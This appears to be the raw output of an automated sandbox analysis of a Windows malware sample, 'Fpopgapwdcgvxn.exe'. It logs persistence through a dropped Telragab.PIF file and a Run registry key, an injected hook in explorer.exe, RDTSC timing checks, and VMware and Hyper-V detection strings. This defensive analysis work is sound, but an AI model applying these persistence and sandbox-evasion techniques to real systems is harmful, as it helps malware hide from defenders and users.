              Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 00000003.00000003.2320149761.000000000530E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000002.2404040114.000000001E79E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000003.2318073446.0000000005151000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2389849761.00000000046CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2387898399.0000000004512000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4616342750.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4616342750.0000000004870000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.2580553834.000000000474F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2626388526.000000001E340000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.2578529137.0000000004596000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2626388526.000000001E4DE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000003.2615483603.00000000055AC000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2618280438.00000000058FE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2618280438.0000000005760000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000003.2613575726.00000000053F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 00000003.00000003.2320149761.000000000530E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000002.2404040114.000000001E79E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000003.2318073446.0000000005151000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2389849761.00000000046CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2387898399.0000000004512000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4616342750.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4616342750.0000000004870000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.2580553834.000000000474F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2626388526.000000001E340000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.2578529137.0000000004596000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2626388526.000000001E4DE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000003.2615483603.00000000055AC000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2618280438.00000000058FE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2618280438.0000000005760000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000003.2613575726.00000000053F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rundll32.pdb source: colorcpl.exe, 00000003.00000002.2388060963.00000000053F0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000003.00000003.2386689890.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4615286421.0000000000C00000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: rundll32.pdbGCTL source: colorcpl.exe, 00000003.00000002.2388060963.00000000053F0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000003.00000003.2386689890.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4615286421.0000000000C00000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: easinvoker.pdbH source: Fpopgapwdcgvxn.exe, 00000000.00000002.2320819738.0000000002AE0000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000002.2347225090.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000003.2292292192.000000007EC00000.00000004.00001000.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara match | File source: Fpopgapwdcgvxn.exe, type: SAMPLE
              Source: Yara match | File source: 0.2.Fpopgapwdcgvxn.exe.31a77bc.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 9.2.Telragab.PIF.313bc90.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.Fpopgapwdcgvxn.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.Fpopgapwdcgvxn.exe.32b0000.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: C:\Users\Public\Libraries\Telragab.PIF, type: DROPPED
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_026A8272 push esp; iretd 0_3_026A8284
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_026A7473 push ecx; ret 0_3_026A7476
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_026A7627 push ebp; iretd 0_3_026A7628
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_026A7230 push ebp; iretd 0_3_026A728C
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_026A821E push esp; iretd 0_3_026A822F
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_026A74C9 push ebp; iretd 0_3_026A74CA
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_026A3CCC push ss; ret 0_3_026A3CD6
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_026A7494 push ecx; ret 0_3_026A749D
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_026A6B4A push ebp; iretd 0_3_026A6B6A
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_026A2B42 pushad ; retf 0_3_026A2B66
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_026A7D0E push esp; iretd 0_3_026A7D0F
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_026A81FE push esp; iretd 0_3_026A820B
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_026A81F2 push esp; iretd 0_3_026A81F7
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_026A39D3 pushad ; iretd 0_3_026A39D4
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_026A81AF push esp; iretd 0_3_026A81F0
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_026A81AF push esp; iretd 0_3_026A81FC
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_031AC60C push edi; ret 0_3_031AC610
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_031A9300 push ecx; ret 0_3_031A9303
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_031ABF06 push edi; iretd 0_3_031ABF6A
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_031AA03C push esp; iretd 0_3_031AA07D
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_031AA03C push esp; iretd 0_3_031AA089
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_031AC520 push edi; ret 0_3_031AC571
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_031A9321 push ecx; ret 0_3_031A932A
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_031A9356 push ebp; iretd 0_3_031A9357
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_031AB457 pushfd ; retf 0_3_031AB458
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_031AC57A push edi; ret 0_3_031AC581
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_031AA07F push esp; iretd 0_3_031AA084
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_031AC572 push edi; ret 0_3_031AC571
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_031AC572 push edi; ret 0_3_031AC579
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_031A9B9B push esp; iretd 0_3_031A9B9C
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_3_031AB39F pushfd ; retf 0_3_031AB3A5
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_2_032F7040 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_032F7040

              Persistence and Installation Behavior

              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | File created: C:\Users\Public\Libraries\Telragab.PIF
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Telragab

              Hooking and other Techniques for Hiding and Protection

              Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xEE
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_2_032F2264 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,0_2_032F2264
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_2_032DAEB8 IsIconic,GetWindowPlacement,GetWindowRect,0_2_032DAEB8
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_2_033031B4 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,0_2_033031B4
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_2_032F1030 IsIconic,GetCapture,0_2_032F1030
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_2_032F1938 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,0_2_032F1938
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_2_033039A8 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,0_2_033039A8
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_2_033038E4 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,0_2_033038E4
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_2_032FFCF0 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,0_2_032FFCF0
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_2_03308838 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_03308838
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\Telragab.PIF | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000068B9904 second address: 00000000068B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000068B9B6E second address: 00000000068B9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000719904 second address: 000000000071990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000719B6E second address: 0000000000719B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000065F9904 second address: 00000000065F990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000065F9B6E second address: 00000000065F9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004D19904 second address: 0000000004D1990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004D19B6E second address: 0000000004D19B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 2F70000 memory commit 240005120
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 2F71000 memory commit 240427008
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 2FD9000 memory commit 240005120
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 2FDA000 memory commit 240078848
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 2FED000 memory commit 241016832
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 30E5000 memory commit 240013312
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 30E8000 memory commit 240029696
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory allocated: 32B0000 memory commit 280006656
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory allocated: 32B1000 memory commit 280424448
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory allocated: 3319000 memory commit 280002560
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory allocated: 331A000 memory commit 280076288
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory allocated: 332D000 memory commit 281018368
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory allocated: 3425000 memory commit 280014848
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory allocated: 3428000 memory commit 280031232
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 3280000 memory commit 260005888
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 3281000 memory commit 260423680
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 32E9000 memory commit 260005888
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 32EA000 memory commit 260079616
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 32FD000 memory commit 261017600
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 33F5000 memory commit 260014080
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 33F8000 memory commit 260030464
              Source: C:\Windows\explorer.exe TID: 2036Thread sleep time: -16654000s >= -30000s
              Source: C:\Windows\explorer.exe TID: 2036Thread sleep time: -3228000s >= -30000s
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 2156Thread sleep count: 176 > 30
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 2156Thread sleep time: -352000s >= -30000s
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 2156Thread sleep count: 9793 > 30
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 2156Thread sleep time: -19586000s >= -30000s
              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8327
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1614
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 594
              Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 9793
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeAPI coverage: 7.8 %
              Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 1.6 %
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068B9AA0 rdtsc 3_2_068B9AA0
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,0_2_03302474
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeAPI call chain: ExitProcess graph end nodegraph_0-43037
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C4EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}erPoint.Template.8\CLSIDS@5
              Source: explorer.exe, 00000005.00000000.2334366335.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
              Source: explorer.exe, 00000005.00000002.4623300730.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
              Source: Telragab.PIF, 00000009.00000003.2578378839.0000000000770000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<
              Source: explorer.exe, 00000005.00000003.2979054042.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
              Source: explorer.exe, 00000005.00000002.4623300730.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
              Source: explorer.exe, 00000005.00000000.2324160077.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.0000000000844000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2334366335.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000978C000.00000004.00000001.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000770000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000742000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2686612744.0000000000978000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.0000000000844000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF
              Source: explorer.exe, 00000005.00000000.2324160077.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
              Source: explorer.exe, 00000005.00000003.2980040926.000000000C24C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: explorer.exe, 00000005.00000003.2979054042.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
              Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2686612744.000000000095E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: explorer.exe, 00000005.00000000.2324160077.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: explorer.exe, 00000005.00000003.2979054042.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
              Source: explorer.exe, 00000005.00000000.2324160077.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032B5C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_032B5C18
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032F7040 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_032F7040
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62BE78 mov ecx, dword ptr fs:[00000030h]3_2_1E62BE78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E645E40 mov eax, dword ptr fs:[00000030h]3_2_1E645E40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EDE46 mov eax, dword ptr fs:[00000030h]3_2_1E6EDE46
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BE51 mov eax, dword ptr fs:[00000030h]3_2_1E66BE51
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D9E56 mov ecx, dword ptr fs:[00000030h]3_2_1E6D9E56
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64DE2D mov eax, dword ptr fs:[00000030h]3_2_1E64DE2D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E631E30 mov eax, dword ptr fs:[00000030h]3_2_1E631E30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E703E10 mov eax, dword ptr fs:[00000030h]3_2_1E703E10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BE17 mov eax, dword ptr fs:[00000030h]3_2_1E66BE17
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62DE10 mov eax, dword ptr fs:[00000030h]3_2_1E62DE10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633EE1 mov eax, dword ptr fs:[00000030h]3_2_1E633EE1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FBEE6 mov eax, dword ptr fs:[00000030h]3_2_1E6FBEE6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E663EEB mov ecx, dword ptr fs:[00000030h]3_2_1E663EEB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E663EEB mov eax, dword ptr fs:[00000030h]3_2_1E663EEB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633EF4 mov eax, dword ptr fs:[00000030h]3_2_1E633EF4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62BEC0 mov eax, dword ptr fs:[00000030h]3_2_1E62BEC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BEC0 mov eax, dword ptr fs:[00000030h]3_2_1E63BEC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65FEC0 mov eax, dword ptr fs:[00000030h]3_2_1E65FEC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BFEC5 mov eax, dword ptr fs:[00000030h]3_2_1E6BFEC5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E9EDF mov eax, dword ptr fs:[00000030h]3_2_1E6E9EDF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BDEAA mov eax, dword ptr fs:[00000030h]3_2_1E6BDEAA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62FEA0 mov eax, dword ptr fs:[00000030h]3_2_1E62FEA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62DEA5 mov eax, dword ptr fs:[00000030h]3_2_1E62DEA5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62DEA5 mov ecx, dword ptr fs:[00000030h]3_2_1E62DEA5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DDEB0 mov eax, dword ptr fs:[00000030h]3_2_1E6DDEB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DDEB0 mov ecx, dword ptr fs:[00000030h]3_2_1E6DDEB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DDEB0 mov eax, dword ptr fs:[00000030h]3_2_1E6DDEB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EDEB0 mov eax, dword ptr fs:[00000030h]3_2_1E6EDEB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E663E8F mov eax, dword ptr fs:[00000030h]3_2_1E663E8F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BDE9B mov eax, dword ptr fs:[00000030h]3_2_1E6BDE9B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E637E96 mov eax, dword ptr fs:[00000030h]3_2_1E637E96
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65BF60 mov eax, dword ptr fs:[00000030h]3_2_1E65BF60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6AFF42 mov eax, dword ptr fs:[00000030h]3_2_1E6AFF42
